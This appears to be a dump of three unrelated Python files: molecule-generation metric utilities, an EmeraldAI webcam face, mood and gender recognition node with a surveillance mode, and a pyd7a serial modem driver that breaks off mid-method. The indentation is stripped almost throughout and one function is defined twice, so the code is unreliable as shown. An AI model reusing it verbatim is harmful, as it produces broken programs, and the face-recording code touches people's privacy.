adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
print(node_symbol_prob[0])
print(node_symbol[0])
print(node_symbol_prob.shape)
def check_qed(dataset, filter=None):  # NOTE: shadowed by the metric check_qed(dataset) defined later in this file
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
print(qed_prediction)
print(qed_labels[0])
print(np.mean(np.abs(qed_prediction-qed_labels[0])))
def onehot(idx, len):
z = [0 for _ in range(len)]
z[idx] = 1
return z
def generate_empty_adj_matrix(maximum_vertice_num):
return np.zeros((1, 3, maximum_vertice_num, maximum_vertice_num))
# standard normal with shape [a1, a2, a3]
def generate_std_normal(a1, a2, a3):
return np.random.normal(0, 1, [a1, a2, a3])
def check_validity(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
count=0
for smiles in all_smiles:
mol = Chem.MolFromSmiles(smiles)
if mol is not None:
count+=1
return len(all_smiles), count
# Get length for each graph based on node masks
def get_graph_length(all_node_mask):
all_lengths=[]
for graph in all_node_mask:
if 0 in graph:
length=np.argmin(graph)
else:
length=len(graph)
all_lengths.append(length)
return all_lengths
def make_dir(path):
if not os.path.exists(path):
os.mkdir(path)
print('made directory %s' % path)
# sample node symbols based on node predictions
def sample_node_symbol(all_node_symbol_prob, all_lengths, dataset):
all_node_symbol=[]
for graph_idx, graph_prob in enumerate(all_node_symbol_prob):
node_symbol=[]
for node_idx in range(all_lengths[graph_idx]):
symbol=np.random.choice(np.arange(len(dataset_info(dataset)['atom_types'])), p=graph_prob[node_idx])
node_symbol.append(symbol)
all_node_symbol.append(node_symbol)
return all_node_symbol
def dump(file_name, content):
with open(file_name, 'wb') as out_file:
pickle.dump(content, out_file, pickle.HIGHEST_PROTOCOL)
def load(file_name):
with open(file_name, 'rb') as f:
return pickle.load(f)
# generate a feature marking edges whose addition would create two rings sharing more than two edges
def get_overlapped_edge_feature(edge_mask, color, new_mol):
overlapped_edge_feature=[]
for node_in_focus, neighbor in edge_mask:
if color[neighbor] == 1:
# attempt to add the edge
new_mol.AddBond(int(node_in_focus), int(neighbor), number_to_bond[0])
# Check whether there are two cycles having more than two overlap edges
try:
ssr = Chem.GetSymmSSSR(new_mol)
except:
ssr = []
overlap_flag = False
for idx1 in range(len(ssr)):
for idx2 in range(idx1+1, len(ssr)):
if len(set(ssr[idx1]) & set(ssr[idx2])) > 2:
overlap_flag=True
# remove that edge
new_mol.RemoveBond(int(node_in_focus), int(neighbor))
if overlap_flag:
overlapped_edge_feature.append((node_in_focus, neighbor))
return overlapped_edge_feature
# BFS distances from start on a graph; adj_list maps node -> [(neighbour, edge_type)]
def bfs_distance(start, adj_list, is_dense=False):
distances={}
visited=set()
queue=deque([(start, 0)])
visited.add(start)
while len(queue) != 0:
current, d=queue.popleft()
for neighbor, edge_type in adj_list[current]:
if neighbor not in visited:
distances[neighbor]=d+1
visited.add(neighbor)
queue.append((neighbor, d+1))
return [(start, node, d) for node, d in distances.items()]
def get_initial_valence(node_symbol, dataset):
return [dataset_info(dataset)['maximum_valence'][s] for s in node_symbol]
def add_atoms(new_mol, node_symbol, dataset):
for number in node_symbol:
if dataset=='qm9' or dataset=='cep':
idx=new_mol.AddAtom(Chem.Atom(dataset_info(dataset)['number_to_atom'][number]))
elif dataset=='zinc':
new_atom = Chem.Atom(dataset_info(dataset)['number_to_atom'][number])
charge_num=int(dataset_info(dataset)['atom_types'][number].split('(')[1].strip(')'))
new_atom.SetFormalCharge(charge_num)
new_mol.AddAtom(new_atom)
def visualize_mol(path, new_mol):
AllChem.Compute2DCoords(new_mol)
print(path)
Draw.MolToFile(new_mol,path)
def get_idx_of_largest_frag(frags):
return np.argmax([len(frag) for frag in frags])
def remove_extra_nodes(new_mol):
frags=Chem.rdmolops.GetMolFrags(new_mol)
while len(frags) > 1:
# Get the idx of the frag with largest length
largest_idx = get_idx_of_largest_frag(frags)
for idx in range(len(frags)):
if idx != largest_idx:
# Remove one atom that is not in the largest frag
new_mol.RemoveAtom(frags[idx][0])
break
frags=Chem.rdmolops.GetMolFrags(new_mol)
def novelty_metric(dataset):
with open('all_smiles_%s.pkl' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
with open('generated_smiles_%s' % dataset, 'rb') as f:
generated_all_smiles=set(pickle.load(f))
total_new_molecules=0
for generated_smiles in generated_all_smiles:
if generated_smiles not in all_smiles:
total_new_molecules+=1
return float(total_new_molecules)/len(generated_all_smiles)
def count_edge_type(dataset, generated=True):
if generated:
filename='generated_smiles_%s' % dataset
else:
filename='all_smiles_%s.pkl' % dataset
with open(filename, 'rb') as f:
all_smiles=set(pickle.load(f))
counter=defaultdict(int)
edge_type_per_molecule=[]
for smiles in all_smiles:
nodes, edges=to_graph(smiles, dataset)
edge_type_this_molecule=[0]* len(bond_dict)
for edge in edges:
edge_type=edge[1]
edge_type_this_molecule[edge_type]+=1
counter[edge_type]+=1
edge_type_per_molecule.append(edge_type_this_molecule)
total_sum=0
return len(all_smiles), counter, edge_type_per_molecule
def need_kekulize(mol):
for bond in mol.GetBonds():
if bond_dict[str(bond.GetBondType())] >= 3:
return True
return False
def check_planar(dataset):
with open("generated_smiles_%s" % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
total_non_planar=0
for smiles in all_smiles:
try:
nodes, edges=to_graph(smiles, dataset)
except:
continue
edges=[(src, dst) for src, e, dst in edges]
if edges==[]:
continue
if not planarity.is_planar(edges):
total_non_planar+=1
return len(all_smiles), total_non_planar
def count_atoms(dataset):
with open("generated_smiles_%s" % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
counter=defaultdict(int)
atom_count_per_molecule=[] # record the counts for each molecule
for smiles in all_smiles:
try:
nodes, edges=to_graph(smiles, dataset)
except:
continue
atom_count_this_molecule=[0]*len(dataset_info(dataset)['atom_types'])
for node in nodes:
atom_type=np.argmax(node)
atom_count_this_molecule[atom_type]+=1
counter[atom_type]+=1
atom_count_per_molecule.append(atom_count_this_molecule)
total_sum=0
return len(all_smiles), counter, atom_count_per_molecule
def align_smiles_by_MCS(smiles_1, smiles_2):
mols = [Chem.MolFromSmiles(smiles_1), Chem.MolFromSmiles(smiles_2)]
res=rdFMCS.FindMCS(mols)
aligned_mols = []
for mol in mols:
sub_idx = list(mol.GetSubstructMatch(Chem.MolFromSmarts(res.smartsString)))
nodes_to_keep = [i for i in range(len(sub_idx))]
mol_range = list(range(mol.GetNumHeavyAtoms()))
idx_to_add = list(set(mol_range).difference(set(sub_idx)))
sub_idx.extend(idx_to_add)
aligned_mols.append(Chem.rdmolops.RenumberAtoms(mol, sub_idx))
return (aligned_mols[0], aligned_mols[1]), res, nodes_to_keep
def to_graph(smiles, dataset):
mol = Chem.MolFromSmiles(smiles)
if mol is None:
return [], []
# Kekulize it
if need_kekulize(mol):
rdmolops.Kekulize(mol)
if mol is None:
return None, None
# remove stereo information, such as inward and outward edges
Chem.RemoveStereochemistry(mol)
edges = []
nodes = []
for bond in mol.GetBonds():
edges.append((bond.GetBeginAtomIdx(), bond_dict[str(bond.GetBondType())], bond.GetEndAtomIdx()))
assert bond_dict[str(bond.GetBondType())] != 3
for atom in mol.GetAtoms():
if dataset=='qm9' or dataset=="cep":
nodes.append(onehot(dataset_info(dataset)['atom_types'].index(atom.GetSymbol()), len(dataset_info(dataset)['atom_types'])))
elif dataset=='zinc': # transform using "<atom_symbol><valence>(<charge>)" notation
symbol = atom.GetSymbol()
valence = atom.GetTotalValence()
charge = atom.GetFormalCharge()
atom_str = "%s%i(%i)" % (symbol, valence, charge)
if atom_str not in dataset_info(dataset)['atom_types']:
print('unrecognized atom type %s' % atom_str)
return [], []
nodes.append(onehot(dataset_info(dataset)['atom_types'].index(atom_str), len(dataset_info(dataset)['atom_types'])))
return nodes, edges
def to_graph_mol(mol, dataset):
if mol is None:
return [], []
# Kekulize it
if need_kekulize(mol):
rdmolops.Kekulize(mol)
if mol is None:
return None, None
# remove stereo information, such as inward and outward edges
Chem.RemoveStereochemistry(mol)
edges = []
nodes = []
for bond in mol.GetBonds():
if mol.GetAtomWithIdx(bond.GetBeginAtomIdx()).GetAtomicNum() == 0 or mol.GetAtomWithIdx(bond.GetEndAtomIdx()).GetAtomicNum() == 0:
continue
else:
edges.append((bond.GetBeginAtomIdx(), bond_dict[str(bond.GetBondType())], bond.GetEndAtomIdx()))
assert bond_dict[str(bond.GetBondType())] != 3
for atom in mol.GetAtoms():
if dataset=='qm9' or dataset=="cep":
nodes.append(onehot(dataset_info(dataset)['atom_types'].index(atom.GetSymbol()), len(dataset_info(dataset)['atom_types'])))
elif dataset=='zinc': # transform using "<atom_symbol><valence>(<charge>)" notation
symbol = atom.GetSymbol()
valence = atom.GetTotalValence()
charge = atom.GetFormalCharge()
atom_str = "%s%i(%i)" % (symbol, valence, charge)
if atom_str not in dataset_info(dataset)['atom_types']:
if "*" in atom_str:
continue
else:
print('unrecognized atom type %s' % atom_str)
return [], []
nodes.append(onehot(dataset_info(dataset)['atom_types'].index(atom_str), len(dataset_info(dataset)['atom_types'])))
return nodes, edges
def check_uniqueness(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=pickle.load(f)
original_num = len(all_smiles)
all_smiles=set(all_smiles)
new_num = len(all_smiles)
return new_num/original_num
def shape_count(dataset, remove_print=False, all_smiles=None):
    if all_smiles is None:
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
geometry_counts=[0]*len(geometry_numbers)
geometry_counts_per_molecule=[] # record the geometry counts for each molecule
for smiles in all_smiles:
nodes, edges = to_graph(smiles, dataset)
if len(edges)<=0:
continue
new_mol=Chem.MolFromSmiles(smiles)
ssr = Chem.GetSymmSSSR(new_mol)
counts_for_molecule=[0] * len(geometry_numbers)
for idx in range(len(ssr)):
ring_len=len(list(ssr[idx]))
if ring_len in geometry_numbers:
geometry_counts[geometry_numbers.index(ring_len)]+=1
counts_for_molecule[geometry_numbers.index(ring_len)]+=1
geometry_counts_per_molecule.append(counts_for_molecule)
return len(all_smiles), geometry_counts, geometry_counts_per_molecule
def check_adjacent_sparse(adj_list, node, neighbor_in_doubt):
for neighbor, edge_type in adj_list[node]:
if neighbor == neighbor_in_doubt:
return True, edge_type
return False, None
def glorot_init(shape):
initialization_range = np.sqrt(6.0 / (shape[-2] + shape[-1]))
return np.random.uniform(low=-initialization_range, high=initialization_range, size=shape).astype(np.float32)
class ThreadedIterator:
"""An iterator object that computes its elements in a parallel thread to be ready to be consumed.
The iterator should *not* return None"""
def __init__(self, original_iterator, max_queue_size: int=2):
self.__queue = queue.Queue(maxsize=max_queue_size)
self.__thread = threading.Thread(target=lambda: self.worker(original_iterator))
self.__thread.start()
def worker(self, original_iterator):
for element in original_iterator:
            assert element is not None, 'By convention, iterator elements must not be None'
self.__queue.put(element, block=True)
self.__queue.put(None, block=True)
def __iter__(self):
next_element = self.__queue.get(block=True)
while next_element is not None:
yield next_element
next_element = self.__queue.get(block=True)
self.__thread.join()
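# Illustrative usage sketch (not in the original code): wrap any iterator so its
# elements are produced on a background thread while the consumer works, e.g.
#     for batch in ThreadedIterator(minibatch_iterator(), max_queue_size=3):
#         process(batch)  # minibatch_iterator and process are hypothetical placeholders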
# Implements multilayer perceptron
class MLP(object):
def __init__(self, in_size, out_size, hid_sizes, dropout_keep_prob):
self.in_size = in_size
self.out_size = out_size
self.hid_sizes = hid_sizes
self.dropout_keep_prob = dropout_keep_prob
self.params = self.make_network_params()
def make_network_params(self):
dims = [self.in_size] + self.hid_sizes + [self.out_size]
weight_sizes = list(zip(dims[:-1], dims[1:]))
weights = [tf.Variable(self.init_weights(s), name='MLP_W_layer%i' % i)
for (i, s) in enumerate(weight_sizes)]
biases = [tf.Variable(np.zeros(s[-1]).astype(np.float32), name='MLP_b_layer%i' % i)
for (i, s) in enumerate(weight_sizes)]
network_params = {
"weights": weights,
"biases": biases,
}
return network_params
def init_weights(self, shape):
return np.sqrt(6.0 / (shape[-2] + shape[-1])) * (2 * np.random.rand(*shape).astype(np.float32) - 1)
def __call__(self, inputs):
acts = inputs
for W, b in zip(self.params["weights"], self.params["biases"]):
hid = tf.matmul(acts, tf.nn.dropout(W, self.dropout_keep_prob)) + b
acts = tf.nn.relu(hid)
last_hidden = hid
return last_hidden
class Graph():
def __init__(self, V, g):
self.V = V
self.graph = g
def addEdge(self, v, w):
        # Add w to v's adjacency list.
        self.graph[v].append(w)
        # Add v to w's adjacency list.
        self.graph[w].append(v)
# A recursive function that uses visited[]
# and parent to detect cycle in subgraph
# reachable from vertex v.
def isCyclicUtil(self, v, visited, parent):
# Mark current node as visited
visited[v] = True
# Recur for all the vertices adjacent
# for this vertex
for i in self.graph[v]:
# If an adjacent is not visited,
# then recur for that adjacent
if visited[i] == False:
if self.isCyclicUtil(i, visited, v) == True:
return True
# If an adjacent is visited and not
# parent of current vertex, then there
# is a cycle.
elif i != parent:
return True
return False
# Returns true if the graph is a tree,
# else false.
def isTree(self):
# Mark all the vertices as not visited
# and not part of recursion stack
visited = [False] * self.V
# The call to isCyclicUtil serves multiple
# purposes. It returns true if graph reachable
        # from vertex 0 is cyclic. It also marks
# all vertices reachable from 0.
if self.isCyclicUtil(0, visited, -1) == True:
return False
# If we find a vertex which is not reachable
        # from 0 (not marked by isCyclicUtil()),
# then we return false
for i in range(self.V):
if visited[i] == False:
return False
return True
# check whether the generated graphs are trees (connected and acyclic)
def check_cyclic(dataset, generated=True):
if generated:
with open("generated_smiles_%s" % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
else:
with open("all_smiles_%s.pkl" % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
tree_count=0
for smiles in all_smiles:
nodes, edges=to_graph(smiles, dataset)
edges=[(src, dst) for src, e, dst in edges]
if edges==[]:
continue
new_adj_list=defaultdict(list)
for src, dst in edges:
new_adj_list[src].append(dst)
new_adj_list[dst].append(src)
graph=Graph(len(nodes), new_adj_list)
if graph.isTree():
tree_count+=1
return len(all_smiles), tree_count
def check_logp(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
logp_sum=0
total=0
logp_score_per_molecule=[]
for smiles in all_smiles:
new_mol=Chem.MolFromSmiles(smiles)
try:
val = Crippen.MolLogP(new_mol)
except:
continue
logp_sum+=val
logp_score_per_molecule.append(val)
total+=1
return logp_sum/total, logp_score_per_molecule
def check_qed(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
qed_sum=0
total=0
qed_score_per_molecule=[]
for smiles in all_smiles:
new_mol=Chem.MolFromSmiles(smiles)
try:
val = QED.qed(new_mol)
except:
continue
qed_sum+=val
qed_score_per_molecule.append(val)
total+=1
return qed_sum/total, qed_score_per_molecule
def sssr_metric(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
overlapped_molecule=0
for smiles in all_smiles:
new_mol=Chem.MolFromSmiles(smiles)
ssr = Chem.GetSymmSSSR(new_mol)
overlap_flag=False
for idx1 in range(len(ssr)):
for idx2 in range(idx1+1, len(ssr)):
if len(set(ssr[idx1]) & set(ssr[idx2])) > 2:
overlap_flag=True
if overlap_flag:
overlapped_molecule+=1
return overlapped_molecule/len(all_smiles)
# select the best based on shapes and probs
def select_best(all_mol):
# sort by shape
all_mol=sorted(all_mol)
best_shape=all_mol[-1][0]
all_mol=[(p, m) for s, p, m in all_mol if s==best_shape]
# sort by probs
all_mol=sorted(all_mol)
return all_mol[-1][1]
# a series of utility functions converting sparse representations to dense ones
def incre_adj_mat_to_dense(incre_adj_mat, num_edge_types, maximum_vertice_num):
new_incre_adj_mat=[]
for sparse_incre_adj_mat in incre_adj_mat:
dense_incre_adj_mat=np.zeros((num_edge_types, maximum_vertice_num,maximum_vertice_num))
for current, adj_list in sparse_incre_adj_mat.items():
for neighbor, edge_type in adj_list:
dense_incre_adj_mat[edge_type][current][neighbor]=1
new_incre_adj_mat.append(dense_incre_adj_mat)
return new_incre_adj_mat # [number_iteration,num_edge_types,maximum_vertice_num, maximum_vertice_num]
def distance_to_others_dense(distance_to_others, maximum_vertice_num):
new_all_distance=[]
for sparse_distances in distance_to_others:
dense_distances=np.zeros((maximum_vertice_num), dtype=int)
for x, y, d in sparse_distances:
dense_distances[y]=d
new_all_distance.append(dense_distances)
return new_all_distance # [number_iteration, maximum_vertice_num]
def overlapped_edge_features_to_dense(overlapped_edge_features, maximum_vertice_num):
new_overlapped_edge_features=[]
for sparse_overlapped_edge_features in overlapped_edge_features:
dense_overlapped_edge_features=np.zeros((maximum_vertice_num), dtype=int)
for node_in_focus, neighbor in sparse_overlapped_edge_features:
dense_overlapped_edge_features[neighbor]=1
new_overlapped_edge_features.append(dense_overlapped_edge_features)
return new_overlapped_edge_features # [number_iteration, maximum_vertice_num]
def node_sequence_to_dense(node_sequence,maximum_vertice_num):
new_node_sequence=[]
for node in node_sequence:
s=[0]*maximum_vertice_num
s[node]=1
new_node_sequence.append(s)
return new_node_sequence # [number_iteration, maximum_vertice_num]
def node_keep_to_dense(nodes_to_keep, maximum_vertice_num):
s=[0]*maximum_vertice_num
for node in nodes_to_keep:
s[node]=1
return s
def edge_type_masks_to_dense(edge_type_masks, maximum_vertice_num, num_edge_types):
new_edge_type_masks=[]
for mask_sparse in edge_type_masks:
mask_dense=np.zeros([num_edge_types, maximum_vertice_num])
for node_in_focus, neighbor, bond in mask_sparse:
mask_dense[bond][neighbor]=1
new_edge_type_masks.append(mask_dense)
return new_edge_type_masks #[number_iteration, 3, maximum_vertice_num]
def edge_type_labels_to_dense(edge_type_labels, maximum_vertice_num,num_edge_types):
new_edge_type_labels=[]
for labels_sparse in edge_type_labels:
labels_dense=np.zeros([num_edge_types, maximum_vertice_num])
for node_in_focus, neighbor, bond in labels_sparse:
labels_dense[bond][neighbor]= 1/float(len(labels_sparse)) # fix the probability bug here.
new_edge_type_labels.append(labels_dense)
return new_edge_type_labels #[number_iteration, 3, maximum_vertice_num]
def edge_masks_to_dense(edge_masks, maximum_vertice_num):
new_edge_masks=[]
for mask_sparse in edge_masks:
mask_dense=[0] * maximum_vertice_num
for node_in_focus, neighbor in mask_sparse:
mask_dense[neighbor]=1
new_edge_masks.append(mask_dense)
return new_edge_masks # [number_iteration, maximum_vertice_num]
def edge_labels_to_dense(edge_labels, maximum_vertice_num):
new_edge_labels=[]
for label_sparse in edge_labels:
label_dense=[0] * maximum_vertice_num
for node_in_focus, neighbor in label_sparse:
label_dense[neighbor]=1/float(len(label_sparse))
new_edge_labels.append(label_dense)
return new_edge_labels # [number_iteration, maximum_vertice_num]
|
CV.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
from os.path import dirname, abspath
sys.path.append(dirname(dirname(dirname(dirname(abspath(__file__))))))
reload(sys)
sys.setdefaultencoding('utf-8')
from threading import Thread
import cv2
import time
import rospy
from std_msgs.msg import String
from EmeraldAI.Entities.PredictionObject import PredictionObject
from EmeraldAI.Logic.ComputerVision.ComputerVision import ComputerVision
from EmeraldAI.Config.Config import Config
from EmeraldAI.Logic.ComputerVision.ModelMonitor import ModelMonitor
from EmeraldAI.Logic.Modules import Pid
class WebcamVideoStream:
def __init__(self, camID):
self.stream = cv2.VideoCapture(camID)
self.stream.set(3, Config().GetInt("ComputerVision", "CameraWidth"))
self.stream.set(4, Config().GetInt("ComputerVision", "CameraHeight"))
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
while True:
if self.stopped:
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
returnValue = self.frame
self.frame = None
return returnValue
def stop(self):
self.stopped = True
def EnsureModelUpdate():
predictionModules = Config().GetList("ComputerVision", "Modules")
ModelMonitor().EnsureModelUpdate(predictionModules)
def RunCV(camID, camType, surveillanceMode, videoStream):
pub = rospy.Publisher('/emerald_ai/io/computer_vision', String, queue_size=10)
rospy.init_node('CV_node', anonymous=True)
rospy.Rate(10) # 10hz
if(camType == "STD"):
camType = Config().Get("ComputerVision", "CameraType")
if(not surveillanceMode):
surveillanceMode = Config().GetBoolean("ComputerVision", "SurveillanceMode")
cvInstanceType = "CV"
if(surveillanceMode):
cvInstanceType = "CVSURV"
if videoStream is not None:
stream = videoStream.start()
else:
camera = cv2.VideoCapture(camID)
camera.set(3, Config().GetInt("ComputerVision", "CameraWidth"))
camera.set(4, Config().GetInt("ComputerVision", "CameraHeight"))
alwaysRecordFace = Config().GetBoolean("ComputerVision", "AlwaysRecordFace")
cropBodyImage = Config().GetBoolean("ComputerVision", "CropBodyImage")
intervalBetweenImages = Config().GetInt("ComputerVision", "IntervalBetweenImages")
bodyDetectionInterval = Config().GetInt("ComputerVision", "BodyDetectionInterval")
predictionThreshold = Config().GetInt("ComputerVision.Prediction", "PredictionThreshold")
showCameraImage = Config().GetBoolean("ComputerVision", "ShowCameraImage")
unknownUserTag = Config().Get("ComputerVision", "UnknownUserTag")
detectionSettings = Config().Get("ComputerVision", "DetectionSettings")
print "Detection Settings: " + detectionSettings
cv = ComputerVision()
predictionObjectList = []
predictionModules = Config().GetList("ComputerVision", "Modules")
for moduleName in predictionModules:
model, dictionary = cv.LoadModel(moduleName)
if (model is None or dictionary is None):
continue
print "load", moduleName
predictionObjectList.append(PredictionObject(moduleName, model, dictionary))
clockFace = time.time()
if videoStream is not None:
image = stream.read()
while image is None:
print "Waiting for stream"
time.sleep(1)
image = stream.read()
else:
while not camera.isOpened():
print "Waiting for camera"
time.sleep(1)
_, image = camera.read()
imageHeight, imageWidth = image.shape[:2]
bodyDetectionTimestamp = time.time()
skipImageCounter = 0
while True:
#rate.sleep()
if videoStream is not None:
image = stream.read()
else:
_, image = camera.read()
if(image is None):
skipImageCounter += 1
if(skipImageCounter > 250):
print "Skip image"
skipImageCounter = 0
continue
if (showCameraImage):
cv2.imshow("image", image)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
lumaThreshold = Config().GetInt("ComputerVision", "DarknessThreshold") #
lumaValue = cv.GetLuma(image)
if (lumaValue < lumaThreshold):
lumaData = "{0}|DARKNESS|{1}|{2}".format(cvInstanceType, camType, lumaValue)
#print lumaData
pub.publish(lumaData)
time.sleep(1)
continue
# Body Detection
if((surveillanceMode or bodyDetectionInterval < 999) and bodyDetectionTimestamp <= (time.time()-bodyDetectionInterval)):
rawBodyData = cv.DetectBody(image)
if (len(rawBodyData) > 0):
bodyDetectionTimestamp = time.time()
cv.TakeImage(image, "Body", (rawBodyData if cropBodyImage else None))
# Face Detection
predictionResult, timeoutReached, luckyShot, rawFaceData = cv.PredictStream(image, predictionObjectList)
takeImage = False
bestResultName = None
for predictionObject in predictionResult:
thresholdReached = predictionObject.ThresholdReached(predictionThreshold)
if len(predictionObject.PredictionResult) > 0 and (thresholdReached or timeoutReached or luckyShot):
for key, _ in predictionObject.PredictionResult.iteritems():
bestResult = predictionObject.GetBestPredictionResult(key, 0)
if (predictionObject.Name == "Person"):
secondBestResult = predictionObject.GetBestPredictionResult(key, 1)
if(bestResult[0] == unknownUserTag):
takeImage = True
bestResultName = bestResult[0] if (len(secondBestResult) == 0) else secondBestResult[0]
predictionData = "{0}|PERSON|{1}|{2}|{3}|{4}|{5}|{6}|{7}".format(cvInstanceType, camType, key, bestResult, secondBestResult, thresholdReached, timeoutReached, luckyShot)
if (predictionObject.Name == "Mood"):
predictionData = "{0}|MOOD|{1}|{2}|{3}".format(cvInstanceType, camType, key, bestResult)
if (predictionObject.Name == "Gender"):
predictionData = "{0}|GENDER|{1}|{2}|{3}".format(cvInstanceType, camType, key, bestResult)
#print predictionData
pub.publish(predictionData)
# Face position detection
faceID = 0
for (x, y, w, h) in rawFaceData:
centerX = (x + w/2)
centerY = (y + h/2)
if (centerX < imageWidth/3):
posX = "right"
elif (centerX > imageWidth/3*2):
posX = "left"
else:
posX = "center"
if (centerY < imageHeight/5):
posY = "top"
elif (centerY > imageHeight/5*4):
posY = "bottom"
else:
posY = "center"
positionData = "{0}|POSITION|{1}|{2}|{3}|{4}".format(cvInstanceType, camType, faceID, posX, posY)
#print positionData
pub.publish(positionData)
faceID += 1
# Take Images
if((alwaysRecordFace or takeImage) and clockFace <= (time.time()-intervalBetweenImages) and cv.TakeImage(image, "Person", rawFaceData, grayscale=True, prefix=bestResultName)):
clockFace = time.time()
if __name__ == "__main__":
camID = -1
camType = "STD"
surveillanceMode = False
if len(sys.argv) > 1:
for arg in sys.argv:
if (arg.lower().startswith("-cam")):
camID = int(arg.lower().replace("-cam", ""))
if (arg.lower().startswith("-type")):
                camType = arg.lower().replace("-type", "")  # camera type is a string (e.g. "STD"), not an int
if (arg.lower().startswith("-surveillance")):
surveillanceMode = True
if(camID < 0):
camID = Config().GetInt("ComputerVision", "CameraID")
tmpCamID = "" if camID == -1 else camID
if(Pid.HasPid("CV{0}".format(tmpCamID))):
print "Process is already runnung. Bye!"
sys.exit()
Pid.Create("CV{0}".format(tmpCamID))
videoStream = None
if Config().GetBoolean("ComputerVision", "UseThreadedVideo"):
videoStream = WebcamVideoStream(camID)
try:
EnsureModelUpdate()
RunCV(camID, camType, surveillanceMode, videoStream)
except KeyboardInterrupt:
print "End"
    finally:
        if videoStream is not None:
            videoStream.stop()
        Pid.Remove("CV{0}".format(tmpCamID))
|
modem.py
|
#!/usr/bin/env python
#
# Copyright (c) 2015-2021 University of Antwerp, Aloxy NV.
#
# This file is part of pyd7a.
# See https://github.com/Sub-IoT/pyd7a for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
from datetime import datetime
import struct
from threading import Thread
import threading
import logging
import serial
from bitstring import ConstBitStream
from d7a.alp.operands.file import DataRequest
from d7a.alp.operands.length import Length
from d7a.alp.operands.offset import Offset
from d7a.alp.operations.requests import ReadFileData
from d7a.alp.operations.responses import ReturnFileData
from d7a.alp.regular_action import RegularAction
from d7a.serial_modem_interface.parser import Parser, MessageType
from d7a.alp.command import Command
from d7a.system_files.firmware_version import FirmwareVersionFile
from d7a.system_files.uid import UidFile
from d7a.system_files.system_file_ids import SystemFileIds
class Modem:
def __init__(self, device, baudrate, unsolicited_response_received_callback=None, rebooted_callback=None, skip_alp_parsing=False):
self.log = logging.getLogger(__name__)
self.parser = Parser(skip_alp_parsing)
self.config = {
"device" : device,
"baudrate" : baudrate
}
self.lock=threading.Lock()
self.uid = None
self.firmware_version = None
self.skip_alp_parsing = skip_alp_parsing
self._sync_execution_response_cmds = []
self._sync_execution_tag_id = None
self._sync_execution_completed = False
self._unsolicited_responses_received = []
self._rebooted_received = []
self._read_async_active = False
self.unsolicited_response_received_callback = unsolicited_response_received_callback
self.rebooted_callback = rebooted_callback
self.connected = False
self.dev = serial.Serial(
port = self.config["device"],
baudrate = self.config["baudrate"],
timeout = None,
parity = serial.PARITY_NONE,
stopbits = serial.STOPBITS_ONE,
bytesize = serial.EIGHTBITS,
xonxoff = False,
rtscts = False,
dsrdtr = False,
exclusive = True,
)
self.dev.flush() # ignore possible buffered data
self.start_reading()
def connect(self, check_alive=True):
if self.connected:
return
if not check_alive:
self.connected = True
return True
read_modem_info_action = Command.create_with_read_file_action_system_file(UidFile())
read_modem_info_action.add_action(
RegularAction(
operation=ReadFileData(
operand=DataRequest(
offset=Offset(id=FirmwareVersionFile().id, offset=Length(0)), # TODO offset size
length=FirmwareVersionFile().length
)
)
)
)
if self.skip_alp_parsing:
self.log.info("Running in skip_alp_parsing mode, not checking if we can receive the modem's UID")
self.connected = True
self.execute_command_async(read_modem_info_action)
return True
resp_cmd = self.execute_command(read_modem_info_action, timeout_seconds=10)
if len(resp_cmd) == 0:
self.log.warning("Timed out reading node information")
return False
for action in resp_cmd[0].actions:
if type(action) is RegularAction and type(action.operation) is ReturnFileData:
if action.operand.offset.id == SystemFileIds.UID.value:
                    self.uid = '{:x}'.format(struct.unpack(">Q", bytes(bytearray(action.operand.data)))[0])
if action.operand.offset.id == SystemFileIds.FIRMWARE_VERSION.value:
self.firmware_version = FirmwareVersionFile.parse(ConstBitStream(bytearray(action.operand.data)), action.operand.offset.offset.value, action.operand.length.value)
if self.uid and self.firmware_version:
self.connected = True
if self.connected:
self.log.info("connected to {}, node UID {} running D7AP v{}, application \"{}\" with git sha1 {}".format(
self.config["device"], self.uid, self.firmware_version.d7ap_version,
self.firmware_version.application_name, self.firmware_version.git_sha1)
)
return True
else:
return False
def execute_command_async(self, alp_command):
self.execute_command(alp_command, timeout_seconds=0)
def execute_command(self, alp_command, timeout_seconds=10):
if self.skip_alp_parsing:
self.log.info("Running in skip_alp_parsing mode, execute_command() synchronously is not possible in this mode,"
"executing async instead ")
timeout_seconds = 0
data = self.parser.build_serial_frame(alp_command)
self._sync_execution_response_cmds = []
self._sync_execution_tag_id = None
self._sync_execution_completed = False
if(timeout_seconds > 0):
assert self._sync_execution_tag_id is None
self._sync_execution_tag_id = alp_command.tag_id
with self.lock:
self.dev.write(data)
self.dev.flush()
self.log.info("Sending command of size %s" % len(data))
self.log.debug("> " + " ".join(map(lambda b: format(b, "02x"), data)))
if timeout_seconds == 0:
return []
self.log.info("Waiting for response (max {} s)".format(timeout_seconds))
